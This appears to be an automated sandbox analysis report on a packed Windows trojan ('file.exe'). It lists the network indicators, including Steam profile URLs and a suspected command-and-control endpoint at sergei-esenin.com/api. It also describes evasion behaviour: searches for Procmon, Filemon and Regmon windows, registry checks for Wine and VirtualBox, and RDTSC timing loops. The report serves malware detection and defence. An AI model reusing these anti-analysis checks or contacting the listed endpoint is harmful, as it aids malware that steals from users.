    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.2078215009.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/h;
    Source: file.exe, 00000000.00000003.2078215009.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/p;
    Source: file.exe, 00000000.00000002.2266194355.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000002.2266194355.00000000011E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000002.2266194355.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900$
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000002.2266194355.00000000011D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-X
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49706 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 1896
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995616749174917
    Source: file.exeStatic PE information: Section: xuggjiye ZLIB complexity 0.9939983686308221
    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7140
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3237ed40-a961-483f-8d9d-82984247d3a3Jump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 1896
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 1808384 > 1048576
    Source: file.exeStatic PE information: Raw size of xuggjiye is bigger than: 0x100000 < 0x18fe00

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.780000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xuggjiye:EW;eirrygcb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xuggjiye:EW;eirrygcb:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1c01ae should be: 0x1c81cc
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: xuggjiye
    Source: file.exeStatic PE information: section name: eirrygcb
    Source: file.exeStatic PE information: section name: .taggant
    Source: file.exeStatic PE information: section name: entropy: 7.986794328834298
    Source: file.exeStatic PE information: section name: xuggjiye entropy: 7.95408344029227

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AA0C second address: 94AA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AA12 second address: 94AA32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDDACF47FE8h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95111B second address: 95113E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 js 00007FDDACAD5286h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDDACAD5290h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95113E second address: 951151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDDACF47FDBh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9513D9 second address: 9513DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9516A8 second address: 9516AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9516AD second address: 9516DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD528Dh 0x00000007 pushad 0x00000008 jmp 00007FDDACAD5295h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951846 second address: 95184C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95184C second address: 951850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951850 second address: 95187C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDDh 0x00000007 js 00007FDDACF47FD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FDDACF47FE5h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95187C second address: 951888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FDDACAD5286h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95404C second address: 954052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954052 second address: 954056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
